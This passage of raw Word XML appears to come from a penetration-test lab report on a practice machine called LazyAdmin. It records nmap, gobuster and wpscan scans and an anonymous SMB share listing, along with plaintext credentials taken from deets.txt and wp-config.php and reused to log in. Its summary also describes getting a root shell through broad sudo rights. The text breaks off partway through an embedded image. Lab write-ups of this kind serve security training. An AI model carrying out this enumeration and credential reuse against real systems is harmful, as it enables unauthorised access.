          <w:p w14:paraId="70FCEA87" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>10.0.100.107</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCEA8B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA89" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA8A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>LazyAdmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCEA8E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA8C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA8D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>04-05-2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00863B21" w14:paraId="70FCEA91" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA8F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Point Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FCEA90" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70FCEA92" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="exploitation-overview-3"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="70FCEA93" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On this machine, we find an exposed SMB share which allows us to anonymously read several files, including a file containing a password and a php configuration file which contains the database password. Since the latter also discloses a username, we can use that to sign into the SSH server. To escalate our privileges, we utilize overly broad </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rights to grant ourselves a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA94" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="service-enumeration-2"/>
      <w:r>
        <w:t>Service Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="70FCEA95" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="portscan---tcp-3"/>
      <w:r>
        <w:t>Portscan - TCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="70FCEA96" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># nmap -p- --min-rate 1000 -sV 10.0.100.107</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 05:10 EDT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Nmap scan report for 10.0.100.107</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Host is up (0.0046s latency).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Not shown: 65529 closed ports</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>PORT     STATE SERVICE     VERSION</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>3306/tcp open  mysql       MySQL (unauthorized)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>6667/tcp open  irc         InspIRCd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>MAC Address: 00:0C:29:80:C7:69 (VMware)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA97" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="network-interfaces-3"/>
      <w:r>
        <w:t>Network interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="70FCEA98" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>lo: 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>eth0: 10.0.100.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA99" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="credentials-3"/>
      <w:r>
        <w:t>Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="70FCEA9A" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>togie:12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA9B" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="exploitation-and-proof-3"/>
      <w:r>
        <w:t>Exploitation and proof</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="70FCEA9C" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="initial-access-3"/>
      <w:r>
        <w:t>Initial access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="70FCEA9D" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:bookmarkStart w:id="100" w:name="vulnerability-exploitation-6"/>
      <w:r>
        <w:t>Vulnerability exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w14:paraId="70FCEA9E" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap finds several ports open. Looking at the web server first, we find several directories that may be of interest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEA9F" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># gobuster dir -u http://10.0.0.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[...]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/index.html (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/info.php (Status: 200)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/wordpress (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/test (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/wp (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/apache (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/old (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/javascript (Status: 301)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/phpmyadmin (Status: 301)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA0" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We find a Wordpress instance at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/wordpress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and a login page for PHPMyAdmin at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>/phpmyadmin</w:t>
      </w:r>
      <w:r>
        <w:t>. Unfortunately, the Wordpress instance doesn’t seem to contain any vulnerable plugins, and we don’t have any creds for MySQL to login to the DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA1" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>wpscan --plugins-detection aggressive -e ap --url http://10.0.100.107/wordpress/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># No notable results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA2" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We continue our enumeration with SMB. Running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>smbclient -L 10.0.100.107</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns three shares, among which the non-default and hidden share </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>share$</w:t>
      </w:r>
      <w:r>
        <w:t>. Let’s see if we can connect to that!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA3" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t># smbclient //10.0.100.107/share$</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter WORKGROUP\root's password: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Try "help" to get a list of possible commands.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>smb: \&gt; dir</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  .                                   D        0  Tue Aug 15 07:05:52 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ..                                  D        0  Mon Aug 14 08:34:47 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  wordpress                           D        0  Tue Aug 15 07:21:08 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  Backnode_files                      D        0  Mon Aug 14 08:08:26 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  wp                                  D        0  Tue Aug 15 06:51:23 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  deets.txt                           N      139  Mon Aug 14 08:20:05 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  robots.txt                          N       92  Mon Aug 14 08:36:14 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  todolist.txt                        N       79  Mon Aug 14 08:39:56 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  apache                              D        0  Mon Aug 14 08:35:19 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  index.html                          N    36072  Sun Aug  6 01:02:15 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  info.php                            N       20  Tue Aug 15 06:55:19 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  test                                D        0  Mon Aug 14 08:35:10 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  old                                 D        0  Mon Aug 14 08:35:13 2017</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                3029776 blocks of size 1024. 1404884 blocks available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA4" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nice, we have a listing of the files hosted on the web server. Very interesting! Unfortunately, we cannot put a webshell through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, but we can pull interesting files and inspect them. The file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>deets.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contains a password of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>12345</w:t>
      </w:r>
      <w:r>
        <w:t>, but we’re not sure what the account is or who it is for. Further, we get some database credentials from the Wordpress configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA5" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cat wp-config.php                                                 </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">php                                                                                                               </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>// ** MySQL settings - You can get this info from your web host ** //</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>/** The name of the database for WordPress */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'DB_NAME'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'wordpress'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>/** MySQL database username */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'DB_USER'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'Admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>/** MySQL database password */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'DB_PASSWORD'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'TogieMYSQL12345^^'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>/** MySQL hostname */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>define</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'DB_HOST'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'localhost'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA6" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Using these credentials, we can succesfully log in to PHPMyAdmin. Unfortunately, this version is not vulnerable and we can’t seem to access potentially interesting database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCEAA7" w14:textId="77777777" w:rsidR="00863B21" w:rsidRDefault="00AB0EA3">
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70FCEAE8" wp14:editId="70FCEAE9">
            <wp:extent cx="5943600" cy="4761270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture" descr="915f50888d0e04ae85ae7582e06fcaf9.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture" descr="_resources/e054884fa6084498bc1ab532725145a5.png"/>
                    <pic:cNvPicPr>
